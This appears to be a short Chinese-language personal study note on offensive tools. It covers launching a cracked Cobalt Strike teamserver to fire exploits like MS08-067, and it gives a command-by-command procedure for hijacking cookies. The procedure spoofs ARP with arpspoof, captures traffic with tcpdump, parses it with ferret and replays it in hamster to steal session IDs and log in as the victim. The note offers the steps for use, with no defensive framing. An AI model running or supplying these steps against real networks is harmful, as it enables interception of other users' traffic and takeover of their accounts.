新认识的几个软件【......打开了新世界的大门......】
1.cobaltstrike(图形化msf等)
破解版使用方法:现在kali打开文件,右击在终端打开,输入./teamserver ip 密码
windows下打开jar文件,可查找ms08_067等直接exploit,后续一些操作有待补充【】
2.hamster sidejacking tool(用于coolie劫取等)
其他
一、ARP攻击劫持cookie
首先进行ARP欺骗,https://blog.csdn.net/xyx107/article/details/79201501;(查资料的时候发现了另一种方法:arpspoof -i eth0 -t 10.10.10.2 10.10.10.129->https://blog.csdn.net/strom2418/article/details/50039645)
将抓到的包tcpdump -i eth0 -A host ip -w 1.pacp保存到1.pacp文件;
打开软件的powershell:shift+右击,在终端打开,输入./ferret -r 1.pacp;
打开hamster ;然后浏览器打开127.0.0.1:1234;
可以打开cookie,获取sessionID,登录;